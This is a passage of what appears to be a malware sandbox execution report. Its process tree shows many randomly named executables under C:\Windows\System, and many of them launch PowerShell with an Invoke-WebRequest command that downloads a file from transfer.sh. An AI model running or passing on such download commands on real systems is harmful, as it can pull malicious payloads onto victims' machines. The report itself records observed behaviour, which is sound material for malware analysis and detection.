    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5076
- C:\Windows\System\OicuQKX.exe
  C:\Windows\System\OicuQKX.exe
  2⤵
  PID:5100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4240
- C:\Windows\System\qhGRxHE.exe
  C:\Windows\System\qhGRxHE.exe
  2⤵
  PID:4400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4344
- C:\Windows\System\zathXxz.exe
  C:\Windows\System\zathXxz.exe
  2⤵
  PID:4676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4908
- C:\Windows\System\OSJoozs.exe
  C:\Windows\System\OSJoozs.exe
  2⤵
  PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4312
- C:\Windows\System\VHcHpTF.exe
  C:\Windows\System\VHcHpTF.exe
  2⤵
  PID:2920
- C:\Windows\System\ZfynuQg.exe
  C:\Windows\System\ZfynuQg.exe
  2⤵
  PID:5204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5236
- C:\Windows\System\wZBbVwe.exe
  C:\Windows\System\wZBbVwe.exe
  2⤵
  PID:5248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5272
- C:\Windows\System\MWvSzwT.exe
  C:\Windows\System\MWvSzwT.exe
  2⤵
  PID:5324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5348
- C:\Windows\System\jLgGfPU.exe
  C:\Windows\System\jLgGfPU.exe
  2⤵
  PID:5428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5456
- C:\Windows\System\moocvJa.exe
  C:\Windows\System\moocvJa.exe
  2⤵
  PID:5384
- C:\Windows\System\gNmbVzb.exe
  C:\Windows\System\gNmbVzb.exe
  2⤵
  PID:5488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5540
- C:\Windows\System\ktDCeYW.exe
  C:\Windows\System\ktDCeYW.exe
  2⤵
  PID:5596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5748
- C:\Windows\System\OhDQVZi.exe
  C:\Windows\System\OhDQVZi.exe
  2⤵
  PID:5848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5876
- C:\Windows\System\PqIBAmO.exe
  C:\Windows\System\PqIBAmO.exe
  2⤵
  PID:5908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5936
- C:\Windows\System\TTHqQhE.exe
  C:\Windows\System\TTHqQhE.exe
  2⤵
  PID:5992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6084
- C:\Windows\System\fhnOxRX.exe
  C:\Windows\System\fhnOxRX.exe
  2⤵
  PID:6008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6064
- C:\Windows\System\aHlGjMg.exe
  C:\Windows\System\aHlGjMg.exe
  2⤵
  PID:5976
- C:\Windows\System\qprrufM.exe
  C:\Windows\System\qprrufM.exe
  2⤵
  PID:5960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5260
- C:\Windows\System\ZZkhCvp.exe
  C:\Windows\System\ZZkhCvp.exe
  2⤵
  PID:6052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5708
- C:\Windows\System\dlhcuxH.exe
  C:\Windows\System\dlhcuxH.exe
  2⤵
  PID:6100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3388
- C:\Windows\System\LqnozLV.exe
  C:\Windows\System\LqnozLV.exe
  2⤵
  PID:5256
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5244
- C:\Windows\System\cYbkYUe.exe
  C:\Windows\System\cYbkYUe.exe
  2⤵
  PID:4264
- C:\Windows\System\FrKmNkJ.exe
  C:\Windows\System\FrKmNkJ.exe
  2⤵
  PID:5184
- C:\Windows\System\lxAiwJG.exe
  C:\Windows\System\lxAiwJG.exe
  2⤵
  PID:5440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6340
- C:\Windows\System\KckVizk.exe
  C:\Windows\System\KckVizk.exe
  2⤵
  PID:4664
- C:\Windows\System\TMbPaCp.exe
  C:\Windows\System\TMbPaCp.exe
  2⤵
  PID:5396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6316
- C:\Windows\System\JMrpVqP.exe
  C:\Windows\System\JMrpVqP.exe
  2⤵
  PID:5392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6412
- C:\Windows\System\VmxTJTy.exe
  C:\Windows\System\VmxTJTy.exe
  2⤵
  PID:4988
- C:\Windows\System\edIvkSs.exe
  C:\Windows\System\edIvkSs.exe
  2⤵
  PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5436
- C:\Windows\System\wMsPlWY.exe
  C:\Windows\System\wMsPlWY.exe
  2⤵
  PID:5892
- C:\Windows\System\rOBmNfx.exe
  C:\Windows\System\rOBmNfx.exe
  2⤵
  PID:5124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7796
- C:\Windows\System\YDnMkBd.exe
  C:\Windows\System\YDnMkBd.exe
  2⤵
  PID:4228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6332
- C:\Windows\System\kfmZXdi.exe
  C:\Windows\System\kfmZXdi.exe
  2⤵
  PID:5280
- C:\Windows\System\GaLiRUe.exe
  C:\Windows\System\GaLiRUe.exe
  2⤵
  PID:6244
- C:\Windows\System\mdhyvtc.exe
  C:\Windows\System\mdhyvtc.exe
  2⤵
  PID:6280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1980
- C:\Windows\System\cxuhgOc.exe
  C:\Windows\System\cxuhgOc.exe
  2⤵
  PID:6352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7968
- C:\Windows\System\lUloqla.exe
  C:\Windows\System\lUloqla.exe
  2⤵
  PID:6384
- C:\Windows\System\bFWvnei.exe
  C:\Windows\System\bFWvnei.exe
  2⤵
  PID:6468
- C:\Windows\System\TREjOee.exe
  C:\Windows\System\TREjOee.exe
  2⤵
  PID:6484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:8036
- C:\Windows\System\QVbiTgC.exe
  C:\Windows\System\QVbiTgC.exe
  2⤵
  PID:6524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3248
- C:\Windows\System\sTBInyr.exe
  C:\Windows\System\sTBInyr.exe
  2⤵
  PID:6540
- C:\Windows\System\qtuQjHR.exe
  C:\Windows\System\qtuQjHR.exe
  2⤵
  PID:6560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1608
- C:\Windows\System\KZDSgnl.exe
  C:\Windows\System\KZDSgnl.exe
  2⤵
  PID:6592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:8068
- C:\Windows\System\vcpjQbz.exe
  C:\Windows\System\vcpjQbz.exe
  2⤵
  PID:6576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3628
- C:\Windows\System\UXExEso.exe
  C:\Windows\System\UXExEso.exe
  2⤵
  PID:6648
- C:\Windows\System\FoWYbNC.exe
  C:\Windows\System\FoWYbNC.exe
  2⤵
  PID:6748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7716
- C:\Windows\System\ShUUxgK.exe
  C:\Windows\System\ShUUxgK.exe
  2⤵
  PID:6844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7468
- C:\Windows\System\nXpejKm.exe
  C:\Windows\System\nXpejKm.exe
  2⤵
  PID:6892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4452
- C:\Windows\System\adSDLDf.exe
  C:\Windows\System\adSDLDf.exe
  2⤵
  PID:6876
- C:\Windows\System\eTbHQdl.exe
  C:\Windows\System\eTbHQdl.exe
  2⤵
  PID:6860
- C:\Windows\System\wLUCWMJ.exe
  C:\Windows\System\wLUCWMJ.exe
  2⤵
  PID:6828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4848
- C:\Windows\System\qfAcQlY.exe
  C:\Windows\System\qfAcQlY.exe
  2⤵
  PID:6812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7476
- C:\Windows\System\bsXvSEa.exe
  C:\Windows\System\bsXvSEa.exe
  2⤵
  PID:6796
- C:\Windows\System\qxUbrEm.exe
  C:\Windows\System\qxUbrEm.exe
  2⤵
  PID:6780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7636
- C:\Windows\System\FZvTPgO.exe
  C:\Windows\System\FZvTPgO.exe
  2⤵
  PID:6764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3608
- C:\Windows\System\bAEMqvY.exe
  C:\Windows\System\bAEMqvY.exe
  2⤵
  PID:6732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6312
- C:\Windows\System\RenTaqK.exe
  C:\Windows\System\RenTaqK.exe
  2⤵
  PID:6716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7556
- C:\Windows\System\nUGiyfB.exe
  C:\Windows\System\nUGiyfB.exe
  2⤵
  PID:6700
- C:\Windows\System\hZrhRwj.exe
  C:\Windows\System\hZrhRwj.exe
  2⤵
  PID:6680
- C:\Windows\System\JLYByRs.exe
  C:\Windows\System\JLYByRs.exe
  2⤵
  PID:6664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3272
- C:\Windows\System\LnKHCfH.exe
  C:\Windows\System\LnKHCfH.exe
  2⤵
  PID:7124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7836
- C:\Windows\System\SaUflMl.exe
  C:\Windows\System\SaUflMl.exe
  2⤵
  PID:7156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6976
- C:\Windows\System\JUEPeqa.exe
  C:\Windows\System\JUEPeqa.exe
  2⤵
  PID:7140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7920
- C:\Windows\System\UFiuFVF.exe
  C:\Windows\System\UFiuFVF.exe
  2⤵
  PID:7108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1468
- C:\Windows\System\uLSnqAt.exe
  C:\Windows\System\uLSnqAt.exe
  2⤵
  PID:7092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7260
- C:\Windows\System\qlGPLIr.exe
  C:\Windows\System\qlGPLIr.exe
  2⤵
  PID:7076
- C:\Windows\System\uWORqws.exe
  C:\Windows\System\uWORqws.exe
  2⤵
  PID:7060
- C:\Windows\System\zNigfPa.exe
  C:\Windows\System\zNigfPa.exe
  2⤵
  PID:7044
- C:\Windows\System\EGoFYua.exe
  C:\Windows\System\EGoFYua.exe
  2⤵
  PID:7028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7984
- C:\Windows\System\sofXWOA.exe
  C:\Windows\System\sofXWOA.exe
  2⤵
  PID:7012
- C:\Windows\System\HRSYGGA.exe
  C:\Windows\System\HRSYGGA.exe
  2⤵
  PID:6996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7188
- C:\Windows\System\KTLHVUo.exe
  C:\Windows\System\KTLHVUo.exe
  2⤵
  PID:2968
- C:\Windows\System\JtbOlrd.exe
  C:\Windows\System\JtbOlrd.exe
  2⤵
  PID:1724
- C:\Windows\System\CAeyVjL.exe
  C:\Windows\System\CAeyVjL.exe
  2⤵
  PID:6492
- C:\Windows\System\bekujiU.exe
  C:\Windows\System\bekujiU.exe
  2⤵
  PID:6392
- C:\Windows\System\EQlZoiU.exe
  C:\Windows\System\EQlZoiU.exe
  2⤵
  PID:932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2552
- C:\Windows\System\NdYDanr.exe
  C:\Windows\System\NdYDanr.exe
  2⤵
  PID:6364
- C:\Windows\System\qmKtoQA.exe
  C:\Windows\System\qmKtoQA.exe
  2⤵
  PID:6292
- C:\Windows\System\WIUSGzS.exe
  C:\Windows\System\WIUSGzS.exe
  2⤵
  PID:6288
- C:\Windows\System\ZxFPCno.exe
  C:\Windows\System\ZxFPCno.exe
  2⤵
  PID:6220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6788
- C:\Windows\System\dbyhvyv.exe
  C:\Windows\System\dbyhvyv.exe
  2⤵
  PID:2524
- C:\Windows\System\pXPmOhS.exe
  C:\Windows\System\pXPmOhS.exe
  2⤵
  PID:2292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4788
- C:\Windows\System\FYTBrrf.exe
  C:\Windows\System\FYTBrrf.exe
  2⤵
  PID:2536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2948
- C:\Windows\System\cbTvtVg.exe
  C:\Windows\System\cbTvtVg.exe
  2⤵
  PID:1260
- C:\Windows\System\ougBHuU.exe
  C:\Windows\System\ougBHuU.exe
  2⤵
  PID:1164
- C:\Windows\System\yvElEhb.exe
  C:\Windows\System\yvElEhb.exe
  2⤵
  PID:6856
- C:\Windows\System\NomsiRY.exe
  C:\Windows\System\NomsiRY.exe
  2⤵
  PID:6640
- C:\Windows\System\voGlHNV.exe
  C:\Windows\System\voGlHNV.exe
  2⤵
  PID:7136
- C:\Windows\System\myRTUwG.exe
  C:\Windows\System\myRTUwG.exe
  2⤵
  PID:7072
- C:\Windows\System\zsykmTZ.exe
  C:\Windows\System\zsykmTZ.exe
  2⤵
  PID:7036
- C:\Windows\System\NvnyUKO.exe
  C:\Windows\System\NvnyUKO.exe
  2⤵
  PID:6944
- C:\Windows\System\NtShARB.exe
  C:\Windows\System\NtShARB.exe
  2⤵
  PID:6808
- C:\Windows\System\lcVRTBG.exe
  C:\Windows\System\lcVRTBG.exe
  2⤵
  PID:6712
- C:\Windows\System\RXqCUDO.exe
  C:\Windows\System\RXqCUDO.exe
  2⤵
  PID:6608
- C:\Windows\System\YPjkcLN.exe
  C:\Windows\System\YPjkcLN.exe
  2⤵
  PID:3564
- C:\Windows\System\ATiSZRz.exe
  C:\Windows\System\ATiSZRz.exe
  2⤵
  PID:6792
- C:\Windows\System\gStUcvB.exe
  C:\Windows\System\gStUcvB.exe
  2⤵
  PID:6728
- C:\Windows\System\TsWVYAd.exe
  C:\Windows\System\TsWVYAd.exe
  2⤵
  PID:6660
- C:\Windows\System\wFsdElh.exe
  C:\Windows\System\wFsdElh.exe
  2⤵
  PID:6572
- C:\Windows\System\qPDCukq.exe
  C:\Windows\System\qPDCukq.exe
  2⤵
  PID:3508
- C:\Windows\System\eLzutRo.exe
  C:\Windows\System\eLzutRo.exe
  2⤵
  PID:3476
- C:\Windows\System\HsAHWPQ.exe
  C:\Windows\System\HsAHWPQ.exe
  2⤵
  PID:7056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3432
- C:\Windows\System\EcTldro.exe
  C:\Windows\System\EcTldro.exe
  2⤵
  PID:6624
- C:\Windows\System\lhRmxcx.exe
  C:\Windows\System\lhRmxcx.exe
  2⤵
  PID:6536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2128
- C:\Windows\System\HmXHgwQ.exe
  C:\Windows\System\HmXHgwQ.exe
  2⤵
  PID:7004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5480
- C:\Windows\System\ZnusxyY.exe
  C:\Windows\System\ZnusxyY.exe
  2⤵
  PID:6568
- C:\Windows\System\gPLnRsr.exe
  C:\Windows\System\gPLnRsr.exe
  2⤵
  PID:2124
- C:\Windows\System\CrajWOU.exe
  C:\Windows\System\CrajWOU.exe
  2⤵
  PID:6208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7668
- C:\Windows\System\pncwqNZ.exe
  C:\Windows\System\pncwqNZ.exe
  2⤵
  PID:2932
- C:\Windows\System\jLgpQNh.exe
  C:\Windows\System\jLgpQNh.exe
  2⤵
  PID:6992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3516
- C:\Windows\System\VgZkTZZ.exe
  C:\Windows\System\VgZkTZZ.exe
  2⤵
  PID:6424
- C:\Windows\System\ARJSaLP.exe
  C:\Windows\System\ARJSaLP.exe
  2⤵
  PID:5224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2652
- C:\Windows\System\IkvFOyL.exe
  C:\Windows\System\IkvFOyL.exe
  2⤵
  PID:1836
- C:\Windows\System\qhFMdXz.exe
  C:\Windows\System\qhFMdXz.exe
  2⤵
  PID:320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:928
- C:\Windows\System\ILUcftH.exe
  C:\Windows\System\ILUcftH.exe
  2⤵
  PID:7120
- C:\Windows\System\WTQfgRR.exe
  C:\Windows\System\WTQfgRR.exe
  2⤵
  PID:6584
- C:\Windows\System\lABGPbx.exe
  C:\Windows\System\lABGPbx.exe
  2⤵
  PID:6532
- C:\Windows\System\luCQvhB.exe
  C:\Windows\System\luCQvhB.exe
  2⤵
  PID:7240
- C:\Windows\System\PZApCaf.exe
  C:\Windows\System\PZApCaf.exe
  2⤵
  PID:7224
- C:\Windows\System\OEGnpaD.exe
  C:\Windows\System\OEGnpaD.exe
  2⤵
  PID:7208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6920
- C:\Windows\System\BtliJke.exe
  C:\Windows\System\BtliJke.exe
  2⤵
  PID:7192
- C:\Windows\System\WMLtrib.exe
  C:\Windows\System\WMLtrib.exe
  2⤵
  PID:7176
- C:\Windows\System\XhXAEsA.exe
  C:\Windows\System\XhXAEsA.exe
  2⤵
  PID:6904
- C:\Windows\System\bUXMxXq.exe
  C:\Windows\System\bUXMxXq.exe
  2⤵
  PID:1500
- C:\Windows\System\UKaUObY.exe
  C:\Windows\System\UKaUObY.exe
  2⤵
  PID:5956
- C:\Windows\System\mhxapBy.exe
  C:\Windows\System\mhxapBy.exe
  2⤵
  PID:7132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1012
- C:\Windows\System\DSxOvsQ.exe
  C:\Windows\System\DSxOvsQ.exe
  2⤵
  PID:6776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7420
- C:\Windows\System\STwKKDh.exe
  C:\Windows\System\STwKKDh.exe
  2⤵
  PID:6940
- C:\Windows\System\KiacKEn.exe
  C:\Windows\System\KiacKEn.exe
  2⤵
  PID:3488
- C:\Windows\System\hYNhYmj.exe
  C:\Windows\System\hYNhYmj.exe
  2⤵
  PID:6956
- C:\Windows\System\ckvMgVV.exe
  C:\Windows\System\ckvMgVV.exe
  2⤵
  PID:7284
- C:\Windows\System\jHAvgvM.exe
  C:\Windows\System\jHAvgvM.exe
  2⤵
  PID:7480
- C:\Windows\System\PAIqufY.exe
  C:\Windows\System\PAIqufY.exe
  2⤵
  PID:7512
- C:\Windows\System\kHCgBwG.exe
  C:\Windows\System\kHCgBwG.exe
  2⤵
  PID:7496
- C:\Windows\System\hvUZlxM.exe
  C:\Windows\System\hvUZlxM.exe
  2⤵
  PID:7460
- C:\Windows\System\YMgCKYQ.exe
  C:\Windows\System\YMgCKYQ.exe
  2⤵
  PID:7444
- C:\Windows\System\wXwGWin.exe
  C:\Windows\System\wXwGWin.exe
  2⤵
  PID:7428
- C:\Windows\System\JeoNeZh.exe
  C:\Windows\System\JeoNeZh.exe
  2⤵
  PID:7412
- C:\Windows\System\xkNFRVO.exe
  C:\Windows\System\xkNFRVO.exe
  2⤵
  PID:7396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:8168
- C:\Windows\System\uENiHic.exe
  C:\Windows\System\uENiHic.exe
  2⤵
  PID:7380
- C:\Windows\System\ZcuCbrw.exe
  C:\Windows\System\ZcuCbrw.exe
  2⤵
  PID:7364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:6408
- C:\Windows\System\dLhDMzt.exe
  C:\Windows\System\dLhDMzt.exe
  2⤵
  PID:7348
- C:\Windows\System\gfrEbQS.exe
  C:\Windows\System\gfrEbQS.exe
  2⤵
  PID:7332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:8172
- C:\Windows\System\CyAquHs.exe
  C:\Windows\System\CyAquHs.exe
  2⤵
  PID:7644
- C:\Windows\System\NNyUehq.exe
  C:\Windows\System\NNyUehq.exe
  2⤵
  PID:7804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7388
- C:\Windows\System\jlYSYJb.exe
  C:\Windows\System\jlYSYJb.exe
  2⤵
  PID:7788
- C:\Windows\System\eyiKIMI.exe
  C:\Windows\System\eyiKIMI.exe
  2⤵
  PID:7772
- C:\Windows\System\OHGKSZB.exe
  C:\Windows\System\OHGKSZB.exe
  2⤵
  PID:7756
- C:\Windows\System\LkNjiRj.exe
  C:\Windows\System\LkNjiRj.exe
  2⤵
  PID:7740
- C:\Windows\System\RIvvSen.exe
  C:\Windows\System\RIvvSen.exe
  2⤵
  PID:7724
- C:\Windows\System\MQXEaZG.exe
  C:\Windows\System\MQXEaZG.exe
  2⤵
  PID:7708
- C:\Windows\System\UKCvtzF.exe
  C:\Windows\System\UKCvtzF.exe
  2⤵
  PID:7692
- C:\Windows\System\TKWGPxE.exe
  C:\Windows\System\TKWGPxE.exe
  2⤵
  PID:7676
- C:\Windows\System\cGUwNLp.exe
  C:\Windows\System\cGUwNLp.exe
  2⤵
  PID:7660
- C:\Windows\System\khSlqCm.exe
  C:\Windows\System\khSlqCm.exe
  2⤵
  PID:7628
- C:\Windows\System\ZPdlnyv.exe
  C:\Windows\System\ZPdlnyv.exe
  2⤵
  PID:7612
- C:\Windows\System\esiJOMy.exe
  C:\Windows\System\esiJOMy.exe
  2⤵
  PID:7928
- C:\Windows\System\kSWKAXy.exe
  C:\Windows\System\kSWKAXy.exe
  2⤵
  PID:8072
- C:\Windows\System\YEgTELS.exe
  C:\Windows\System\YEgTELS.exe
  2⤵
  PID:8104
- C:\Windows\System\zXMSgHt.exe
  C:\Windows\System\zXMSgHt.exe
  2⤵
  PID:8088
- C:\Windows\System\lWhpYty.exe
  C:\Windows\System\lWhpYty.exe
  2⤵
  PID:8056
- C:\Windows\System\LhZKTPz.exe
  C:\Windows\System\LhZKTPz.exe
  2⤵
  PID:8040
- C:\Windows\System\qGiRzkg.exe
  C:\Windows\System\qGiRzkg.exe
  2⤵
  PID:8024
- C:\Windows\System\ZsVpGol.exe
  C:\Windows\System\ZsVpGol.exe
  2⤵
  PID:8008
- C:\Windows\System\gfpeZUR.exe
  C:\Windows\System\gfpeZUR.exe
  2⤵
  PID:7992
- C:\Windows\System\hdwwkaz.exe
  C:\Windows\System\hdwwkaz.exe
  2⤵
  PID:7976
- C:\Windows\System\iORtqLE.exe
  C:\Windows\System\iORtqLE.exe
  2⤵
  PID:7960
- C:\Windows\System\XhOuSLN.exe
  C:\Windows\System\XhOuSLN.exe
  2⤵
  PID:7944
- C:\Windows\System\yjmfiqV.exe
